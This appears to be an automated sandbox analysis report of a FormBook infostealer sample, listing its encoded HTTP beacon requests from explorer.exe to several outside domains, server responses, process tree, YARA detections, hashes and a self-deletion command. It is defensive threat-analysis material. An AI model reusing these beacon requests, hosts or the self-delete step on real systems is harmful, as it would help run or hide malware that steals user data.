6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65
                                            Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, some


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.2.349789203.170.80.25380C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 27, 2021 19:14:30.605387926 CEST9735OUTGET /fqiq/?t4=S7zufRYckdaRFFMeU2i8sPw6oODMRAGo5BePfs9LVZnwdcptwuHxEcdCnQUJ/1YT2L5I&7ntl=P0DdOFE HTTP/1.1
                                            Host: www.passiverewardssystems.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            4192.168.2.34981118.118.119.18380C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 27, 2021 19:14:36.087368965 CEST9784OUTGET /fqiq/?7ntl=P0DdOFE&t4=37G2EJO5ajdFCPilMv01MVSoTtyG1cwu/oJiLg0B75A/3Z+IhDAr8cszuRbw5Svr7Hw7 HTTP/1.1
                                            Host: www.sosoon.store
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:36.235888004 CEST9786INHTTP/1.1 404 Not Found
                                            Server: nginx/1.14.1
                                            Date: Wed, 27 Oct 2021 17:14:36 GMT
                                            Content-Type: text/html
                                            Content-Length: 169
                                            Connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            5192.168.2.349816108.167.135.12280C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 27, 2021 19:14:41.554748058 CEST9798OUTGET /fqiq/?t4=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&7ntl=P0DdOFE HTTP/1.1
                                            Host: www.esyscoloradosprings.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:41.696489096 CEST9800INHTTP/1.1 503 Service Unavailable
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 884
                                            Connection: close
                                            P3P: CP="CAO PSA OUR"
                                            Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                            Pragma: no-cache
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 23 61 61 61 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 20 20 7d 0d 0a 20 20 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 20 20 62 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 3c 68 31 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 6f 77 6e 6c 6f 61 64 20 6f 66 20 74 68 65 20 76 69 72 75 73 2f 73 70 79 77 61 72 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 63 6f 6d 70 61 6e 79 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 69 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 62 3e 46 69 6c 65 20 6e 61 6d 65 3a 3c 2f 62 3e 20 20 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Virus/Spyware Download Blocked</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"><meta name="viewport" content="initial-scale=1.0"><style> #content { border:3px solid#aaa; background-color:#fff; margin:1.5em; padding:1.5em; font-family:Tahoma,Helvetica,Arial,sans-serif; font-size:1em; } h1 { font-size:1.3em; font-weight:bold; color:#196390; } b { font-weight:normal; color:#196390; }</style></head><body bgcolor="#e7e8e9"><div id="content"><h1>Virus/Spyware Download Blocked</h1><p>Download of the virus/spyware has been blocked in accordance with company policy. Please contact your system administrator if you believe this is in error.</p><p><b>File name:</b> </p></div></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            6192.168.2.349817156.240.150.2280C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 27, 2021 19:14:52.189634085 CEST9801OUTGET /fqiq/?t4=iMQAtVYJ5rSxYH2x6+rXrM9PD6xR/OhOVeuwgCEnac3/UPHz+dInplYvIFxL5JBy9ykq&7ntl=P0DdOFE HTTP/1.1
                                            Host: www.24000words.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:52.424355030 CEST9802INHTTP/1.1 200 OK
                                            Date: Wed, 27 Oct 2021 17:14:52 GMT
                                            Content-Length: 798
                                            Content-Type: text/html
                                            Server: nginx
                                            Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e cb ab d1 bc c9 bd b7 d0 d7 d1 d0 c5 d3 c3 b5 a3 b1 a3 d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></body></html></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            7192.168.2.349818172.67.216.280C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 27, 2021 19:14:57.489799023 CEST9802OUTGET /fqiq/?7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+ HTTP/1.1
                                            Host: www.healthyweekendtips.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:57.515161991 CEST9803INHTTP/1.1 301 Moved Permanently
                                            Date: Wed, 27 Oct 2021 17:14:57 GMT
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Cache-Control: max-age=3600
                                            Expires: Wed, 27 Oct 2021 18:14:57 GMT
                                            Location: https://www.healthyweekendtips.com/fqiq/?7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5D1eXR4p2fJe882mIae8SPTGlhe7nnaOlKPFLrQXlzIMhBl9Y%2FnfiBvnR2i5ZMNEaPleGGKb%2BuYs05wAjXEMwI5xNH4xQyLNJJeEBO%2FeE%2FTQqjGhvRUh2brFEu8FMKXOFoyd2sXgHmi4sXOLBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 6a4d904d5bbb6963-FRA
                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                            Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            8192.168.2.34981934.102.136.18080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 27, 2021 19:15:07.637352943 CEST9804OUTGET /fqiq/?7ntl=P0DdOFE&t4=t9SsZ/MS+FgAljVT/evJl5FFrjjg4DD8GLJQPa9p2h0JK2Hk2yZve+gJxH10C5UF88V/ HTTP/1.1
                                            Host: www.thedusi.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:15:07.816297054 CEST9805INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Wed, 27 Oct 2021 17:15:07 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "61797039-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:19:13:01
                                            Start date:27/10/2021
                                            Path:C:\Users\user\Desktop\CtTYTpaAKA.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\CtTYTpaAKA.exe'
                                            Imagebase:0x610000
                                            File size:512000 bytes
                                            MD5 hash:4A640B5ABFD52DC70EB962BF9F250714
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low

                                            General

                                            Start time:19:13:03
                                            Start date:27/10/2021
                                            Path:C:\Users\user\Desktop\CtTYTpaAKA.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\CtTYTpaAKA.exe
                                            Imagebase:0x540000
                                            File size:512000 bytes
                                            MD5 hash:4A640B5ABFD52DC70EB962BF9F250714
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:19:13:06
                                            Start date:27/10/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff720ea0000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            General

                                            Start time:19:13:30
                                            Start date:27/10/2021
                                            Path:C:\Windows\SysWOW64\cscript.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\cscript.exe
                                            Imagebase:0x840000
                                            File size:143360 bytes
                                            MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Start time:19:13:34
                                            Start date:27/10/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'
                                            Imagebase:0xd80000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:19:13:35
                                            Start date:27/10/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7f20f0000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                            Reset < >